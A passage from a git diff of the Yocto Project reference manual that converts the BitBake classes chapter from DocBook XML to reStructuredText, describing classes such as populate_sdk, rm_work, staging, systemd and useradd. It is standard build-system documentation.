+during the :ref:`ref-tasks-patch` task.
+
+This class is enabled by default because it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-perlnative:
+
+``perlnative.bbclass``
+======================
+
+When inherited by a recipe, the ``perlnative`` class supports using the
+native version of Perl built by the build system rather than using the
+version provided by the build host.
+
+.. _ref-classes-pixbufcache:
+
+``pixbufcache.bbclass``
+=======================
+
+The ``pixbufcache`` class generates the proper post-install and
+post-remove (postinst/postrm) scriptlets for packages that install
+pixbuf loaders, which are used with ``gdk-pixbuf``. These scriptlets
+call ``update_pixbuf_cache`` to add the pixbuf loaders to the cache.
+Since the cache files are architecture-specific, ``update_pixbuf_cache``
+is run using QEMU if the postinst scriptlets need to be run on the build
+host during image creation.
+
+If the pixbuf loaders being installed are in packages other than the
+recipe's main package, set
+:term:`PIXBUF_PACKAGES` to specify the packages
+containing the loaders.
+
+.. _ref-classes-pkgconfig:
+
+``pkgconfig.bbclass``
+=====================
+
+The ``pkgconfig`` class provides a standard way to get header and
+library information by using ``pkg-config``. This class aims to smooth
+integration of ``pkg-config`` into libraries that use it.
+
+During staging, BitBake installs ``pkg-config`` data into the
+``sysroots/`` directory. By making use of sysroot functionality within
+``pkg-config``, the ``pkgconfig`` class no longer has to manipulate the
+files.
+
+.. _ref-classes-populate-sdk:
+
+``populate_sdk.bbclass``
+========================
+
+The ``populate_sdk`` class provides support for SDK-only recipes. For
+information on advantages gained when building a cross-development
+toolchain using the :ref:`ref-tasks-populate_sdk`
+task, see the ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual.
+
+.. _ref-classes-populate-sdk-*:
+
+``populate_sdk_*.bbclass``
+==========================
+
+The ``populate_sdk_*`` classes support SDK creation and consist of the
+following classes:
+
+-  ``populate_sdk_base``: The base class supporting SDK creation under
+   all package managers (i.e. DEB, RPM, and opkg).
+
+-  ``populate_sdk_deb``: Supports creation of the SDK given the Debian
+   package manager.
+
+-  ``populate_sdk_rpm``: Supports creation of the SDK given the RPM
+   package manager.
+
+-  ``populate_sdk_ipk``: Supports creation of the SDK given the opkg
+   (IPK format) package manager.
+
+-  ``populate_sdk_ext``: Supports extensible SDK creation under all
+   package managers.
+
+The ``populate_sdk_base`` class inherits the appropriate
+``populate_sdk_*`` (i.e. ``deb``, ``rpm``, and ``ipk``) based on
+:term:`IMAGE_PKGTYPE`.
+
+The base class ensures all source and destination directories are
+established and then populates the SDK. After populating the SDK, the
+``populate_sdk_base`` class constructs two sysroots:
+``${``\ :term:`SDK_ARCH`\ ``}-nativesdk``, which
+contains the cross-compiler and associated tooling, and the target,
+which contains a target root filesystem that is configured for the SDK
+usage. These two images reside in :term:`SDK_OUTPUT`,
+which consists of the following:
+::
+
+   ${SDK_OUTPUT}/${SDK_ARCH}-nativesdk-pkgs
+   ${SDK_OUTPUT}/${SDKTARGETSYSROOT}/target-pkgs
+
+Finally, the base populate SDK class creates the toolchain environment
+setup script, the tarball of the SDK, and the installer.
+
+The respective ``populate_sdk_deb``, ``populate_sdk_rpm``, and
+``populate_sdk_ipk`` classes each support the specific type of SDK.
+These classes are inherited by and used with the ``populate_sdk_base``
+class.
+
+For more information on the cross-development toolchain generation, see
+the ":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+section in the Yocto Project Overview and Concepts Manual. For
+information on advantages gained when building a cross-development
+toolchain using the :ref:`ref-tasks-populate_sdk`
+task, see the
+":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual.
+
+.. _ref-classes-prexport:
+
+``prexport.bbclass``
+====================
+
+The ``prexport`` class provides functionality for exporting
+:term:`PR` values.
+
+.. note::
+
+   This class is not intended to be used directly. Rather, it is enabled
+   when using "``bitbake-prserv-tool export``".
+
+.. _ref-classes-primport:
+
+``primport.bbclass``
+====================
+
+The ``primport`` class provides functionality for importing
+:term:`PR` values.
+
+.. note::
+
+   This class is not intended to be used directly. Rather, it is enabled
+   when using "``bitbake-prserv-tool import``".
+
+.. _ref-classes-prserv:
+
+``prserv.bbclass``
+==================
+
+The ``prserv`` class provides functionality for using a :ref:`PR
+service <dev-manual/dev-manual-common-tasks:working with a pr service>` in order to
+automatically manage the incrementing of the :term:`PR`
+variable for each recipe.
+
+This class is enabled by default because it is inherited by the
+:ref:`package <ref-classes-package>` class. However, the OpenEmbedded
+build system will not enable the functionality of this class unless
+:term:`PRSERV_HOST` has been set.
+
+.. _ref-classes-ptest:
+
+``ptest.bbclass``
+=================
+
+The ``ptest`` class provides functionality for packaging and installing
+runtime tests for recipes that build software that provides these tests.
+
+This class is intended to be inherited by individual recipes. However,
+the class' functionality is largely disabled unless "ptest" appears in
+:term:`DISTRO_FEATURES`. See the
+":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`"
+section in the Yocto Project Development Tasks Manual for more information
+on ptest.
+
+.. _ref-classes-ptest-gnome:
+
+``ptest-gnome.bbclass``
+=======================
+
+Enables package tests (ptests) specifically for GNOME packages, which
+have tests intended to be executed with ``gnome-desktop-testing``.
+
+For information on setting up and running ptests, see the
+":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-python-dir:
+
+``python-dir.bbclass``
+======================
+
+The ``python-dir`` class provides the base version, location, and site
+package location for Python.
+
+.. _ref-classes-python3native:
+
+``python3native.bbclass``
+=========================
+
+The ``python3native`` class supports using the native version of Python
+3 built by the build system rather than support of the version provided
+by the build host.
+
+.. _ref-classes-pythonnative:
+
+``pythonnative.bbclass``
+========================
+
+When inherited by a recipe, the ``pythonnative`` class supports using
+the native version of Python built by the build system rather than using
+the version provided by the build host.
+
+.. _ref-classes-qemu:
+
+``qemu.bbclass``
+================
+
+The ``qemu`` class provides functionality for recipes that either need
+QEMU or test for the existence of QEMU. Typically, this class is used to
+run programs for a target system on the build host using QEMU's
+application emulation mode.
+
+.. _ref-classes-recipe_sanity:
+
+``recipe_sanity.bbclass``
+=========================
+
+The ``recipe_sanity`` class checks for the presence of any host system
+recipe prerequisites that might affect the build (e.g. variables that
+are set or software that is present).
+
+.. _ref-classes-relocatable:
+
+``relocatable.bbclass``
+=======================
+
+The ``relocatable`` class enables relocation of binaries when they are
+installed into the sysroot.
+
+This class makes use of the :ref:`chrpath <ref-classes-chrpath>` class
+and is used by both the :ref:`cross <ref-classes-cross>` and
+:ref:`native <ref-classes-native>` classes.
+
+.. _ref-classes-remove-libtool:
+
+``remove-libtool.bbclass``
+==========================
+
+The ``remove-libtool`` class adds a post function to the
+:ref:`ref-tasks-install` task to remove all ``.la`` files
+installed by ``libtool``. Removing these files results in them being
+absent from both the sysroot and target packages.
+
+If a recipe needs the ``.la`` files to be installed, then the recipe can
+override the removal by setting ``REMOVE_LIBTOOL_LA`` to "0" as follows:
+::
+
+   REMOVE_LIBTOOL_LA = "0"
+
+.. note::
+
+   The ``remove-libtool`` class is not enabled by default.
+
+.. _ref-classes-report-error:
+
+``report-error.bbclass``
+========================
+
+The ``report-error`` class supports enabling the :ref:`error reporting
+tool <dev-manual/dev-manual-common-tasks:using the error reporting tool>`",
+which allows you to submit build error information to a central database.
+
+The class collects debug information for recipe, recipe version, task,
+machine, distro, build system, target system, host distro, branch,
+commit, and log. From the information, report files using a JSON format
+are created and stored in
+``${``\ :term:`LOG_DIR`\ ``}/error-report``.
+
+.. _ref-classes-rm-work:
+
+``rm_work.bbclass``
+===================
+
+The ``rm_work`` class supports deletion of temporary workspace, which
+can ease your hard drive demands during builds.
+
+The OpenEmbedded build system can use a substantial amount of disk space
+during the build process. A portion of this space is the work files
+under the ``${TMPDIR}/work`` directory for each recipe. Once the build
+system generates the packages for a recipe, the work files for that
+recipe are no longer needed. However, by default, the build system
+preserves these files for inspection and possible debugging purposes. If
+you would rather have these files deleted to save disk space as the
+build progresses, you can enable ``rm_work`` by adding the following to
+your ``local.conf`` file, which is found in the :term:`Build Directory`.
+::
+
+   INHERIT += "rm_work"
+
+If you are
+modifying and building source code out of the work directory for a
+recipe, enabling ``rm_work`` will potentially result in your changes to
+the source being lost. To exclude some recipes from having their work
+directories deleted by ``rm_work``, you can add the names of the recipe
+or recipes you are working on to the ``RM_WORK_EXCLUDE`` variable, which
+can also be set in your ``local.conf`` file. Here is an example:
+::
+
+   RM_WORK_EXCLUDE += "busybox glibc"
+
+.. _ref-classes-rootfs*:
+
+``rootfs*.bbclass``
+===================
+
+The ``rootfs*`` classes support creating the root filesystem for an
+image and consist of the following classes:
+
+-  The ``rootfs-postcommands`` class, which defines filesystem
+   post-processing functions for image recipes.
+
+-  The ``rootfs_deb`` class, which supports creation of root filesystems
+   for images built using ``.deb`` packages.
+
+-  The ``rootfs_rpm`` class, which supports creation of root filesystems
+   for images built using ``.rpm`` packages.
+
+-  The ``rootfs_ipk`` class, which supports creation of root filesystems
+   for images built using ``.ipk`` packages.
+
+-  The ``rootfsdebugfiles`` class, which installs additional files found
+   on the build host directly into the root filesystem.
+
+The root filesystem is created from packages using one of the
+``rootfs*.bbclass`` files as determined by the
+:term:`PACKAGE_CLASSES` variable.
+
+For information on how root filesystem images are created, see the
+":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-classes-sanity:
+
+``sanity.bbclass``
+==================
+
+The ``sanity`` class checks to see if prerequisite software is present
+on the host system so that users can be notified of potential problems
+that might affect their build. The class also performs basic user
+configuration checks from the ``local.conf`` configuration file to
+prevent common mistakes that cause build failures. Distribution policy
+usually determines whether to include this class.
+
+.. _ref-classes-scons:
+
+``scons.bbclass``
+=================
+
+The ``scons`` class supports recipes that need to build software that
+uses the SCons build system. You can use the
+:term:`EXTRA_OESCONS` variable to specify
+additional configuration options you want to pass SCons command line.
+
+.. _ref-classes-sdl:
+
+``sdl.bbclass``
+===============
+
+The ``sdl`` class supports recipes that need to build software that uses
+the Simple DirectMedia Layer (SDL) library.
+
+.. _ref-classes-setuptools:
+
+``setuptools.bbclass``
+======================
+
+The ``setuptools`` class supports Python version 2.x extensions that use
+build systems based on ``setuptools``. If your recipe uses these build
+systems, the recipe needs to inherit the ``setuptools`` class.
+
+.. _ref-classes-setuptools3:
+
+``setuptools3.bbclass``
+=======================
+
+The ``setuptools3`` class supports Python version 3.x extensions that
+use build systems based on ``setuptools3``. If your recipe uses these
+build systems, the recipe needs to inherit the ``setuptools3`` class.
+
+.. _ref-classes-sign_rpm:
+
+``sign_rpm.bbclass``
+====================
+
+The ``sign_rpm`` class supports generating signed RPM packages.
+
+.. _ref-classes-sip:
+
+``sip.bbclass``
+===============
+
+The ``sip`` class supports recipes that build or package SIP-based
+Python bindings.
+
+.. _ref-classes-siteconfig:
+
+``siteconfig.bbclass``
+======================
+
+The ``siteconfig`` class provides functionality for handling site
+configuration. The class is used by the
+:ref:`autotools <ref-classes-autotools>` class to accelerate the
+:ref:`ref-tasks-configure` task.
+
+.. _ref-classes-siteinfo:
+
+``siteinfo.bbclass``
+====================
+
+The ``siteinfo`` class provides information about the targets that might
+be needed by other classes or recipes.
+
+As an example, consider Autotools, which can require tests that must
+execute on the target hardware. Since this is not possible in general
+when cross compiling, site information is used to provide cached test
+results so these tests can be skipped over but still make the correct
+values available. The ``meta/site directory`` contains test results
+sorted into different categories such as architecture, endianness, and
+the ``libc`` used. Site information provides a list of files containing
+data relevant to the current build in the ``CONFIG_SITE`` variable that
+Autotools automatically picks up.
+
+The class also provides variables like ``SITEINFO_ENDIANNESS`` and
+``SITEINFO_BITS`` that can be used elsewhere in the metadata.
+
+.. _ref-classes-spdx:
+
+``spdx.bbclass``
+================
+
+The ``spdx`` class integrates real-time license scanning, generation of
+SPDX standard output, and verification of license information during the
+build.
+
+.. note::
+
+   This class is currently at the prototype stage in the 1.6 release.
+
+.. _ref-classes-sstate:
+
+``sstate.bbclass``
+==================
+
+The ``sstate`` class provides support for Shared State (sstate). By
+default, the class is enabled through the
+:term:`INHERIT_DISTRO` variable's default value.
+
+For more information on sstate, see the
+":ref:`overview-manual/overview-manual-concepts:shared state cache`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-classes-staging:
+
+``staging.bbclass``
+===================
+
+The ``staging`` class installs files into individual recipe work
+directories for sysroots. The class contains the following key tasks:
+
+-  The :ref:`ref-tasks-populate_sysroot` task,
+   which is responsible for handing the files that end up in the recipe
+   sysroots.
+
+-  The
+   :ref:`ref-tasks-prepare_recipe_sysroot`
+   task (a "partner" task to the ``populate_sysroot`` task), which
+   installs the files into the individual recipe work directories (i.e.
+   :term:`WORKDIR`).
+
+The code in the ``staging`` class is complex and basically works in two
+stages:
+
+-  *Stage One:* The first stage addresses recipes that have files they
+   want to share with other recipes that have dependencies on the
+   originating recipe. Normally these dependencies are installed through
+   the :ref:`ref-tasks-install` task into
+   ``${``\ :term:`D`\ ``}``. The ``do_populate_sysroot`` task
+   copies a subset of these files into ``${SYSROOT_DESTDIR}``. This
+   subset of files is controlled by the
+   :term:`SYSROOT_DIRS`,
+   :term:`SYSROOT_DIRS_NATIVE`, and
+   :term:`SYSROOT_DIRS_BLACKLIST`
+   variables.
+
+   .. note::
+
+      Additionally, a recipe can customize the files further by
+      declaring a processing function in the ``SYSROOT_PREPROCESS_FUNCS``
+      variable.
+
+   A shared state (sstate) object is built from these files and the
+   files are placed into a subdirectory of
+   :ref:`structure-build-tmp-sysroots-components`.
+   The files are scanned for hardcoded paths to the original
+   installation location. If the location is found in text files, the
+   hardcoded locations are replaced by tokens and a list of the files
+   needing such replacements is created. These adjustments are referred
+   to as "FIXMEs". The list of files that are scanned for paths is
+   controlled by the :term:`SSTATE_SCAN_FILES`
+   variable.
+
+-  *Stage Two:* The second stage addresses recipes that want to use
+   something from another recipe and declare a dependency on that recipe
+   through the :term:`DEPENDS` variable. The recipe will
+   have a
+   :ref:`ref-tasks-prepare_recipe_sysroot`
+   task and when this task executes, it creates the ``recipe-sysroot``
+   and ``recipe-sysroot-native`` in the recipe work directory (i.e.
+   :term:`WORKDIR`). The OpenEmbedded build system
+   creates hard links to copies of the relevant files from
+   ``sysroots-components`` into the recipe work directory.
+
+   .. note::
+
+      If hard links are not possible, the build system uses actual
+      copies.
+
+   The build system then addresses any "FIXMEs" to paths as defined from
+   the list created in the first stage.
+
+   Finally, any files in ``${bindir}`` within the sysroot that have the
+   prefix "``postinst-``" are executed.
+
+   .. note::
+
+      Although such sysroot post installation scripts are not
+      recommended for general use, the files do allow some issues such
+      as user creation and module indexes to be addressed.
+
+   Because recipes can have other dependencies outside of ``DEPENDS``
+   (e.g. ``do_unpack[depends] += "tar-native:do_populate_sysroot"``),
+   the sysroot creation function ``extend_recipe_sysroot`` is also added
+   as a pre-function for those tasks whose dependencies are not through
+   ``DEPENDS`` but operate similarly.
+
+   When installing dependencies into the sysroot, the code traverses the
+   dependency graph and processes dependencies in exactly the same way
+   as the dependencies would or would not be when installed from sstate.
+   This processing means, for example, a native tool would have its
+   native dependencies added but a target library would not have its
+   dependencies traversed or installed. The same sstate dependency code
+   is used so that builds should be identical regardless of whether
+   sstate was used or not. For a closer look, see the
+   ``setscene_depvalid()`` function in the
+   :ref:`sstate <ref-classes-sstate>` class.
+
+   The build system is careful to maintain manifests of the files it
+   installs so that any given dependency can be installed as needed. The
+   sstate hash of the installed item is also stored so that if it
+   changes, the build system can reinstall it.
+
+.. _ref-classes-syslinux:
+
+``syslinux.bbclass``
+====================
+
+The ``syslinux`` class provides syslinux-specific functions for building
+bootable images.
+
+The class supports the following variables:
+
+-  :term:`INITRD`: Indicates list of filesystem images to
+   concatenate and use as an initial RAM disk (initrd). This variable is
+   optional.
+
+-  :term:`ROOTFS`: Indicates a filesystem image to include
+   as the root filesystem. This variable is optional.
+
+-  :term:`AUTO_SYSLINUXMENU`: Enables creating
+   an automatic menu when set to "1".
+
+-  :term:`LABELS`: Lists targets for automatic
+   configuration.
+
+-  :term:`APPEND`: Lists append string overrides for each
+   label.
+
+-  :term:`SYSLINUX_OPTS`: Lists additional options
+   to add to the syslinux file. Semicolon characters separate multiple
+   options.
+
+-  :term:`SYSLINUX_SPLASH`: Lists a background
+   for the VGA boot menu when you are using the boot menu.
+
+-  :term:`SYSLINUX_DEFAULT_CONSOLE`: Set
+   to "console=ttyX" to change kernel boot default console.
+
+-  :term:`SYSLINUX_SERIAL`: Sets an alternate
+   serial port. Or, turns off serial when the variable is set with an
+   empty string.
+
+-  :term:`SYSLINUX_SERIAL_TTY`: Sets an
+   alternate "console=tty..." kernel boot argument.
+
+.. _ref-classes-systemd:
+
+``systemd.bbclass``
+===================
+
+The ``systemd`` class provides support for recipes that install systemd
+unit files.
+
+The functionality for this class is disabled unless you have "systemd"
+in :term:`DISTRO_FEATURES`.
+
+Under this class, the recipe or Makefile (i.e. whatever the recipe is
+calling during the :ref:`ref-tasks-install` task)
+installs unit files into
+``${``\ :term:`D`\ ``}${systemd_unitdir}/system``. If the unit
+files being installed go into packages other than the main package, you
+need to set :term:`SYSTEMD_PACKAGES` in your
+recipe to identify the packages in which the files will be installed.
+
+You should set :term:`SYSTEMD_SERVICE` to the
+name of the service file. You should also use a package name override to
+indicate the package to which the value applies. If the value applies to
+the recipe's main package, use ``${``\ :term:`PN`\ ``}``. Here
+is an example from the connman recipe:
+::
+
+   SYSTEMD_SERVICE_${PN} = "connman.service"
+
+Services are set up to start on boot automatically
+unless you have set
+:term:`SYSTEMD_AUTO_ENABLE` to "disable".
+
+For more information on ``systemd``, see the
+":ref:`dev-manual/dev-manual-common-tasks:selecting an initialization manager`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-systemd-boot:
+
+``systemd-boot.bbclass``
+========================
+
+The ``systemd-boot`` class provides functions specific to the
+systemd-boot bootloader for building bootable images. This is an
+internal class and is not intended to be used directly.
+
+.. note::
+
+   The ``systemd-boot`` class is a result from merging the ``gummiboot`` class
+   used in previous Yocto Project releases with the ``systemd`` project.
+
+Set the :term:`EFI_PROVIDER` variable to
+"systemd-boot" to use this class. Doing so creates a standalone EFI
+bootloader that is not dependent on systemd.
+
+For information on more variables used and supported in this class, see
+the :term:`SYSTEMD_BOOT_CFG`,
+:term:`SYSTEMD_BOOT_ENTRIES`, and
+:term:`SYSTEMD_BOOT_TIMEOUT` variables.
+
+You can also see the `Systemd-boot
+documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__
+for more information.
+
+.. _ref-classes-terminal:
+
+``terminal.bbclass``
+====================
+
+The ``terminal`` class provides support for starting a terminal session.
+The :term:`OE_TERMINAL` variable controls which
+terminal emulator is used for the session.
+
+Other classes use the ``terminal`` class anywhere a separate terminal
+session needs to be started. For example, the
+:ref:`patch <ref-classes-patch>` class assuming
+:term:`PATCHRESOLVE` is set to "user", the
+:ref:`cml1 <ref-classes-cml1>` class, and the
+:ref:`devshell <ref-classes-devshell>` class all use the ``terminal``
+class.
+
+.. _ref-classes-testimage*:
+
+``testimage*.bbclass``
+======================
+
+The ``testimage*`` classes support running automated tests against
+images using QEMU and on actual hardware. The classes handle loading the
+tests and starting the image. To use the classes, you need to perform
+steps to set up the environment.
+
+.. note::
+
+   Best practices include using :term:`IMAGE_CLASSES` rather than
+   :term:`INHERIT` to inherit the ``testimage`` class for automated image
+   testing.
+
+The tests are commands that run on the target system over ``ssh``. Each
+test is written in Python and makes use of the ``unittest`` module.
+
+The ``testimage.bbclass`` runs tests on an image when called using the
+following:
+::
+
+   $ bitbake -c testimage image
+
+The ``testimage-auto`` class
+runs tests on an image after the image is constructed (i.e.
+:term:`TESTIMAGE_AUTO` must be set to "1").
+
+For information on how to enable, run, and create new tests, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-classes-testsdk:
+
+``testsdk.bbclass``
+===================
+
+This class supports running automated tests against software development
+kits (SDKs). The ``testsdk`` class runs tests on an SDK when called
+using the following:
+::
+
+   $ bitbake -c testsdk image
+
+.. note::
+
+   Best practices include using :term:`IMAGE_CLASSES` rather than
+   :term:`INHERIT` to inherit the ``testsdk`` class for automated SDK
+   testing.
+
+.. _ref-classes-texinfo:
+
+``texinfo.bbclass``
+===================
+
+This class should be inherited by recipes whose upstream packages invoke
+the ``texinfo`` utilities at build-time. Native and cross recipes are
+made to use the dummy scripts provided by ``texinfo-dummy-native``, for
+improved performance. Target architecture recipes use the genuine
+Texinfo utilities. By default, they use the Texinfo utilities on the
+host system.
+
+.. note::
+
+   If you want to use the Texinfo recipe shipped with the build system,
+   you can remove "texinfo-native" from :term:`ASSUME_PROVIDED` and makeinfo
+   from :term:`SANITY_REQUIRED_UTILITIES`.
+
+.. _ref-classes-toaster:
+
+``toaster.bbclass``
+===================
+
+The ``toaster`` class collects information about packages and images and
+sends them as events that the BitBake user interface can receive. The
+class is enabled when the Toaster user interface is running.
+
+This class is not intended to be used directly.
+
+.. _ref-classes-toolchain-scripts:
+
+``toolchain-scripts.bbclass``
+=============================
+
+The ``toolchain-scripts`` class provides the scripts used for setting up
+the environment for installed SDKs.
+
+.. _ref-classes-typecheck:
+
+``typecheck.bbclass``
+=====================
+
+The ``typecheck`` class provides support for validating the values of
+variables set at the configuration level against their defined types.
+The OpenEmbedded build system allows you to define the type of a
+variable using the "type" varflag. Here is an example:
+::
+
+   IMAGE_FEATURES[type] = "list"
+
+.. _ref-classes-uboot-config:
+
+``uboot-config.bbclass``
+========================
+
+The ``uboot-config`` class provides support for U-Boot configuration for
+a machine. Specify the machine in your recipe as follows:
+::
+
+   UBOOT_CONFIG ??= <default>
+   UBOOT_CONFIG[foo] = "config,images"
+
+You can also specify the machine using this method:
+::
+
+   UBOOT_MACHINE = "config"
+
+See the :term:`UBOOT_CONFIG` and :term:`UBOOT_MACHINE` variables for additional
+information.
+
+.. _ref-classes-uninative:
+
+``uninative.bbclass``
+=====================
+
+Attempts to isolate the build system from the host distribution's C
+library in order to make re-use of native shared state artifacts across
+different host distributions practical. With this class enabled, a
+tarball containing a pre-built C library is downloaded at the start of
+the build. In the Poky reference distribution this is enabled by default
+through ``meta/conf/distro/include/yocto-uninative.inc``. Other
+distributions that do not derive from poky can also
+"``require conf/distro/include/yocto-uninative.inc``" to use this.
+Alternatively if you prefer, you can build the uninative-tarball recipe
+yourself, publish the resulting tarball (e.g. via HTTP) and set
+``UNINATIVE_URL`` and ``UNINATIVE_CHECKSUM`` appropriately. For an
+example, see the ``meta/conf/distro/include/yocto-uninative.inc``.
+
+The ``uninative`` class is also used unconditionally by the extensible
+SDK. When building the extensible SDK, ``uninative-tarball`` is built
+and the resulting tarball is included within the SDK.
+
+.. _ref-classes-update-alternatives:
+
+``update-alternatives.bbclass``
+===============================
+
+The ``update-alternatives`` class helps the alternatives system when
+multiple sources provide the same command. This situation occurs when
+several programs that have the same or similar function are installed
+with the same name. For example, the ``ar`` command is available from
+the ``busybox``, ``binutils`` and ``elfutils`` packages. The
+``update-alternatives`` class handles renaming the binaries so that
+multiple packages can be installed without conflicts. The ``ar`` command
+still works regardless of which packages are installed or subsequently
+removed. The class renames the conflicting binary in each package and
+symlinks the highest priority binary during installation or removal of
+packages.
+
+To use this class, you need to define a number of variables:
+
+-  :term:`ALTERNATIVE`
+
+-  :term:`ALTERNATIVE_LINK_NAME`
+
+-  :term:`ALTERNATIVE_TARGET`
+
+-  :term:`ALTERNATIVE_PRIORITY`
+
+These variables list alternative commands needed by a package, provide
+pathnames for links, default links for targets, and so forth. For
+details on how to use this class, see the comments in the
+:yocto_git:`update-alternatives.bbclass </cgit/cgit.cgi/poky/tree/meta/classes/update-alternatives.bbclass>`
+file.
+
+.. note::
+
+   You can use the ``update-alternatives`` command directly in your recipes.
+   However, this class simplifies things in most cases.
+
+.. _ref-classes-update-rc.d:
+
+``update-rc.d.bbclass``
+=======================
+
+The ``update-rc.d`` class uses ``update-rc.d`` to safely install an
+initialization script on behalf of the package. The OpenEmbedded build
+system takes care of details such as making sure the script is stopped
+before a package is removed and started when the package is installed.
+
+Three variables control this class: ``INITSCRIPT_PACKAGES``,
+``INITSCRIPT_NAME`` and ``INITSCRIPT_PARAMS``. See the variable links
+for details.
+
+.. _ref-classes-useradd:
+
+``useradd*.bbclass``
+====================
+
+The ``useradd*`` classes support the addition of users or groups for
+usage by the package on the target. For example, if you have packages
+that contain system services that should be run under their own user or
+group, you can use these classes to enable creation of the user or
+group. The ``meta-skeleton/recipes-skeleton/useradd/useradd-example.bb``
+recipe in the :term:`Source Directory` provides a simple
+example that shows how to add three users and groups to two packages.
+See the ``useradd-example.bb`` recipe for more information on how to use
+these classes.
+
+The ``useradd_base`` class provides basic functionality for user or
+groups settings.
+
+The ``useradd*`` classes support the
+:term:`USERADD_PACKAGES`,
+:term:`USERADD_PARAM`,
+:term:`GROUPADD_PARAM`, and
+:term:`GROUPMEMS_PARAM` variables.
+
+The ``useradd-staticids`` class supports the addition of users or groups
+that have static user identification (``uid``) and group identification
+(``gid``) values.
+
+The default behavior of the OpenEmbedded build system for assigning
+``uid`` and ``gid`` values when packages add users and groups during
+package install time is to add them dynamically. This works fine for
+programs that do not care what the values of the resulting users and
+groups become. In these cases, the order of the installation determines
+the final ``uid`` and ``gid`` values. However, if non-deterministic
+``uid`` and ``gid`` values are a problem, you can override the default,
+dynamic application of these values by setting static values. When you
+set static values, the OpenEmbedded build system looks in
+:term:`BBPATH` for ``files/passwd`` and ``files/group``
+files for the values.
+
+To use static ``uid`` and ``gid`` values, you need to set some
+variables. See the :term:`USERADDEXTENSION`,
+:term:`USERADD_UID_TABLES`,
+:term:`USERADD_GID_TABLES`, and
+:term:`USERADD_ERROR_DYNAMIC` variables.
+You can also see the :ref:`useradd <ref-classes-useradd>` class for
+additional information.
+
+.. note::
+
+   You do not use the ``useradd-staticids`` class directly. You either enable
+   or disable the class by setting the ``USERADDEXTENSION`` variable. If you
+   enable or disable the class in a configured system, :term:`TMPDIR` might
+   contain incorrect ``uid`` and ``gid`` values. Deleting the ``TMPDIR``
+   directory will correct this condition.
+
+.. _ref-classes-utility-tasks:
+
+``utility-tasks.bbclass``
+=========================
+
+The ``utility-tasks`` class provides support for various "utility" type
+tasks that are applicable to all recipes, such as
+:ref:`ref-tasks-clean` and
+:ref:`ref-tasks-listtasks`.
+
+This class is enabled by default because it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-utils:
+
+``utils.bbclass``
+=================
+
+The ``utils`` class provides some useful Python functions that are
+typically used in inline Python expressions (e.g. ``${@...}``). One
+example use is for ``bb.utils.contains()``.
+
+This class is enabled by default because it is inherited by the
+:ref:`base <ref-classes-base>` class.
+
+.. _ref-classes-vala:
+
+``vala.bbclass``
+================
+
+The ``vala`` class supports recipes that need to build software written
+using the Vala programming language.
+
+.. _ref-classes-waf:
+
+``waf.bbclass``
+===============
+
+The ``waf`` class supports recipes that need to build software that uses
+the Waf build system. You can use the
+:term:`EXTRA_OECONF` or
+:term:`PACKAGECONFIG_CONFARGS` variables
+to specify additional configuration options to be passed on the Waf
+command line.
diff --git a/documentation/ref-manual/ref-classes.xml b/documentation/ref-manual/ref-classes.xml
deleted file mode 100644
index f9bbddd724..0000000000
--- a/documentation/ref-manual/ref-classes.xml
+++ /dev/null
@@ -1,3893 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-classes'>
-<title>Classes</title>
-
-<para>
-    Class files are used to abstract common functionality and share it amongst
-    multiple recipe (<filename>.bb</filename>) files.
-    To use a class file, you simply make sure the recipe inherits the class.
-    In most cases, when a recipe inherits a class it is enough to enable its
-    features.
-    There are cases, however, where in the recipe you might need to set
-    variables or override some default behavior.
-</para>
-
-<para>
-    Any <link linkend='metadata'>Metadata</link> usually
-    found in a recipe can also be placed in a class file.
-    Class files are identified by the extension <filename>.bbclass</filename>
-    and are usually placed in a <filename>classes/</filename> directory beneath
-    the <filename>meta*/</filename> directory found in the
-    <link linkend='source-directory'>Source Directory</link>.
-    Class files can also be pointed to by
-    <link linkend='var-BUILDDIR'><filename>BUILDDIR</filename></link>
-    (e.g. <filename>build/</filename>) in the same way as
-    <filename>.conf</filename> files in the <filename>conf</filename> directory.
-    Class files are searched for in
-    <link linkend='var-BBPATH'><filename>BBPATH</filename></link>
-    using the same method by which <filename>.conf</filename> files are
-    searched.
-</para>
-
-<para>
-    This chapter discusses only the most useful and important classes.
-    Other classes do exist within the <filename>meta/classes</filename>
-    directory in the Source Directory.
-    You can reference the <filename>.bbclass</filename> files directly
-    for more information.
-</para>
-
-<section id='ref-classes-allarch'>
-    <title><filename>allarch.bbclass</filename></title>
-
-    <para>
-        The <filename>allarch</filename> class is inherited
-        by recipes that do not produce architecture-specific output.
-        The class disables functionality that is normally needed for recipes
-        that produce executable binaries (such as building the cross-compiler
-        and a C library as pre-requisites, and splitting out of debug symbols
-        during packaging).
-        <note>
-            <para>Unlike some distro recipes (e.g. Debian), OpenEmbedded recipes
-            that produce packages that depend on tunings through use of the
-            <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-            and
-            <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>
-            variables, should never be configured for all architectures
-            using <filename>allarch</filename>.
-            This is the case even if the recipes do not produce
-            architecture-specific output.</para>
-            <para>Configuring such recipes for all architectures causes the
-            <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_*</filename></link>
-            tasks to have different signatures for the machines with different
-            tunings.
-            Additionally, unnecessary rebuilds occur every time an
